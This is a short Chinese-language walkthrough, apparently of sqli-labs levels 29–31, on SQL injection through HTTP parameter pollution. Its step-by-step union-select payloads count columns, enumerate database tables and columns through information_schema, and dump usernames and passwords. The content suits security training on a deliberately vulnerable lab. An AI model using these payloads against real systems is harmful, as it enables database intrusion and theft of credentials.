5.29.第29關 http參數過濾 '閉合

5.29.1.手動注入

（1）判斷注入類型、注入點

'閉合

（2）有回顯，優先用聯合查詢注入，判讀字段數

?id=1&id=2' order by 3 --+
?id=1&id=2' order by 4 --+

（3）判斷回顯位

?id=1&id=0' union select 7,8,9 --+ 

（4）查詢數據庫

?id=1&id=0' union select 1,database(),3 --+ 

（5）查詢表名

?id=1&id=0' union select 7,8,group_concat(table_name) from information_schema.tables where table_schema='security' --+ 

（6）查詢字段名

?id=1&id=0' union select 7,8,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

（7）查詢賬號密碼

?id=1&id=0' union select 7,8,group_concat(id,0x7e,username,0x3a,password) from users --+

waf好像沒有生效，先照著跑跑

5.30.第30關 http參數過濾 "閉合

與29相同

5.31.第31關 http參數過濾 ")閉合

與29、30相同